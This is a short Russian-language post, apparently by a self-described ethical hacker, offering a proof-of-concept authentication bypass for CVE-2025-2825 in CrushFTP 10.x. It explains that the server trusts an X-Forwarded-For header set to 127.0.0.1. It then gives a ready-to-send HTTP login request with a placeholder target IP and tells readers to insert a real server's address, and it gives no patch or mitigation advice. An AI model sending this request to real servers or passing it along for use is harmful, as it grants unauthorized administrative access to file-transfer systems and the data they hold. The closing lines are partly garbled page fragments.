
PoC обхода аутентификации для CVE-2025-2825 – эксплуатация CrushFTP 10.x
CVE-2025-2825 — это критическая уязвимость обхода аутентификации, затрагивающая CrushFTP, широко используемый сервер безопасной передачи файлов. Уязвимость позволяет удалённым злоумышленникам обойти аутентификацию входа и получить административный доступ путём подделки заголовков — обманывая сервер, заставляя его думать, что запрос пришёл с localhost.
Уязвимость возникает из-за неправильной проверки заголовка X-Forwarded-For. Когда этот заголовок установлен в 127.0.0.1, сервер обрабатывает запрос как локальный — обходя аутентификацию.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Замените
target-ipна фактический IP-адрес целевого сервера CrushFTP.
В случае успеха сервер обходит аутентификацию и предоставляет доступ — даже при неверных учётных данных.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Сертифицированный этичный хакер (CEH v13)
Выпускник бакалавриата по компьютерной инженерии
🔗 LinkedIn Profile
🔗 Github Profile